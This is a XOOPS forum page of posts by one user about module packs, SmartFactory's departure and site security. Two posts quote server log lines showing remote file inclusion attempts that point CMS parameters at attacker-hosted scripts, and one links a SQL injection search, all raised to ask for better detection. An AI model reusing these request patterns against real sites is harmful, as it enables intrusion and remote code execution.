Support Forums - All Posts - XOOPS Web Application System

71

Module packs

2009/1/21 9:55
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

There seem to be 2 versions of module packs ??

1, Under downloads box in the LH column -http://sourceforge.net/project/showfiles.php?group_id=41586&package_id=161780&release_id=600856

2. Fromhttps://xoops.org/modules/core/viewcat.php?cid=9

There are different ? Which ones go with the latest version of XOOPS.

Peter

NO to the Microsoft Office format as an ISO standard.
Sign the petition

72

New SQL injection attacks

2008/9/26 13:17
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

I've noticed some entries in our web servers log, that are new in format. As there were for Smartsection, I contacted Marcan from SmartFactory, who has been very helpful in advising about this problem.

It's not a Smartsection issue, but a new type of SQL injection attack.

Try this Google search:

http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=VCr&q=DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST&btnG=Search

some very helpful ways to address the problem. We use protector, but I'm not sure protector will know about this or pickup that there are problems. The logs we have returned a "200" , and this is an issue I have raised before, that a "200" doesn't always means 'all is well'.

If the XOOPS developers are looking to develop a similar module as protector and have it as included in a standard XOOPS release, then there would be certain words/phrases being passed in URL's, that this new module could look for. This webmaster world thread shows how .htaccess can address the problem.

http://www.webmasterworld.com/apache/3731562.htm

HTH

Peter

NO to the Microsoft Office format as an ISO standard.
Sign the petition

73

Re: XOOPS security and php settings

2008/7/30 6:15
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

rpilney wrote:
my site got hit with a php/ms06-014!exploit

it wrote code in the index.php file on line 46

there was info in there that I am not sure I am supposd to repost here so I wont but when users came to the site it would state that the site either had the above exploit using CA or a trojan using another anti virus program.

the file size changed to 3k

not sure what other files might have been messed with. I did not see any other files or folders that were changed on or near the date of that index.php file.

using XOOPS 2.0.18.1 with protector.

Might be best to PM the details to Mamba

NO to the Microsoft Office format as an ISO standard.
Sign the petition

74

Re: Xoops 2.3 Wishlist

2008/7/14 6:50
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

"Profiles" as was standard in XOOPS versions 2.2.x , or if that is not possible, at least this one line modification

Come to think of it, 2.3 is meant to be an upgrade from 2.2.x , and as 2.2.x has the profiles, then 2.3 will have to have the profiles as well I guess ??

NO to the Microsoft Office format as an ISO standard.
Sign the petition

75

Re: Module Packs for XOOPS 2.3

2008/7/11 10:17
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

and sometimes they even try "ftp://" , like this one ..


58.227.193.211 - - [11/Jul/2008:10:19:00 +1000] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" "libwww-perl/5.79"

NO to the Microsoft Office format as an ISO standard.
Sign the petition

76

Re: Xoops 2.3 Wishlist

2008/7/7 13:13
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Stopping guests from viewing user profiles.

File /userinfo.php , find this line


include_once XOOPS_ROOT_PATH.'/class/module.textsanitizer.php';

and add this line AFTER it ..


$xoopsUser or redirect_header('index.php', 3, _NOPERM);

NO to the Microsoft Office format as an ISO standard.
Sign the petition

77

Re: Module Packs for XOOPS 2.3

2008/7/7 12:30
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

Protector hopefully will not be required for XOOPS 2.3.1, we are working on a solution for common problems that this module deals with.

That's great, I have used Protector for a while now, good to hear that the XOOPS core will give a website, at least the same 'protection'.

I see a fair bit of this in web logs ..


221.143.43.214 - - [05/Jul/2008:16:33:27 +1000] "GET /user.php//modify.php?dir_module=http://starhc.com/FormTools1_5_0//global/templates/r.txt?? HTTP/1.1" 200 5977 "-" "libwww-perl/5.79"

and rather than a 200 being returned, I'd like a simple (one line ??) mod to search for 'http://' in the request URI. With Protector installed, these are returning a 200, a 403 would be more appropriate.

I realise the way each website server is configured can play a role here, but even if there was at least an option, to return a 403 if 'http://' was found in the URI. That way, at least some of the malicious activity could be recorded, at present it goes unnoticed (unless someone wants to wade through web server logs).

NO to the Microsoft Office format as an ISO standard.
Sign the petition

78

Re: Are SmartFactory moving away from XOOPS ?

2008/7/7 6:08
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

Perhaps it was XOOPS moving away from SmartFactory like they did from GIJOE. It just depends on how you look at it.

The initiation of any fork of XOOPS, would be for various reasons, however we cannot say that the initiation was 'forced' upon people. That is, XOOPS didn't force any forks, people were supposedly mature enough to make the decision themselves.

Only recently, 'McDonald' stated ...

Quote:

Sooner or later I will change my website to another CMS and this will probably be Impress CMS. When this will happen I will probably drop the support for Xoops.

This wasn't forced upon 'McDonald' by the XOOPS developers or XOOPS community, nor did XOOPS 'move away' from wf-links.

I'm just saying that people make their own decisions.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

79

Re: Are SmartFactory moving away from XOOPS ?

2008/7/4 13:49
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Mamba - Thanks very much for your reply. I must admit I have posted a few bug fixes at Smartfactory forums in the past, and they seem to go unnoticed, .... oh well.

That's good that modules like Smartsection and SmartObject will continue to be supported here. My main concern is actually website security, and at present, with Protector and other changes, the website I run XOOPS on, is well, as 'safe as it can be', from malicious users. So, I wondered if the whole XOOPS core and the modules I use, may be 'at risk'.

However, you have re-assured me, ... thanks a lot.

Peter

NO to the Microsoft Office format as an ISO standard.
Sign the petition

80

Are SmartFactory moving away from XOOPS ?

2008/7/4 10:07
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Fromhttp://smartfactory.ca/modules/smartsection/item.php?itemid=118

Quote:

The SmartFactory Support Forums are moving to ????? !
Published by Tom [tom] on 2008-06-30 (101 reads)
Great news for the SmartFactory modules users! The SmartFactory is pleased to announce a new important step towards a more integrated, unified community developed and supported open source project! As you might know, all the people behind The SmartFactory are among the initiators of the ????? Project and are now 100% invested in this project. Because of this, The SmartFactory Team spend much of its "forum" time on the ????? forums. This may also be the case for other module developers and theme designers.

The SmartFactory will be joining Aphex Themes and Mr Themes on ????? with their own forums.

So what does this mean?

Starting July 1st, The SmartFactory's forums will be locked down and links will be provided towards the ????? forums. Support for the SmartFactory's modules will be created on the ????? Community site. SmartFactory's module users and developers will then be able to use a much more active forum to find an answer to their question and to help others. We believe that the Open Collaborative nature of ????? will allow us to provide a better service for all not only in providing support but in producing far better modules as well.

We realise this may raise concerns for XOOPS users and would like to reasure you that this does not mean XOOPS users will be abandoned, quite the contrary, XOOPS users are more than welcome to ask for support with SmartModules in the new forums on ?????. However, we will not be able to provide support in the xoops.org forums or submit announcements and updates there because we no longer have permission or access to that site.

What does this mean for XOOPS users who are using any of the SmartFactory modules ? Why don't SmartFactory have permission or access to this site ? Can someone please explain what is going on, as there would be thousands of XOOPS users, who are currently using SmartFactory modules ?

How does this affect other modules, like 'wf-links', which uses SmartObject I think.

Are SmartFactory moving away from XOOPS, and going more towards supporting ????? ?

More athttp://smartfactory.ca/modules/smartsection/item.php?itemid=118

Interesting that this post has replaced the word 'Impress CMS' with '?????'

NO to the Microsoft Office format as an ISO standard.
Sign the petition

Stats
Goal:	$100.00
Due Date:	May 31
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Forum Index

Module packs

New SQL injection attacks

Re: XOOPS security and php settings

Re: Xoops 2.3 Wishlist

Re: Module Packs for XOOPS 2.3

Re: Xoops 2.3 Wishlist

Re: Module Packs for XOOPS 2.3

Re: Are SmartFactory moving away from XOOPS ?

Re: Are SmartFactory moving away from XOOPS ?

Are SmartFactory moving away from XOOPS ?

Login

Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Re: NewBB v 5.1.0 b 6

Re: NewBB v 5.1.0 b 6

NewBB v 5.1.0 b 6

Re: XOOPS 2.5.11 search user is not working

Re: oledrion

Re: oledrion

Re: oledrion

Re: oledrion

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}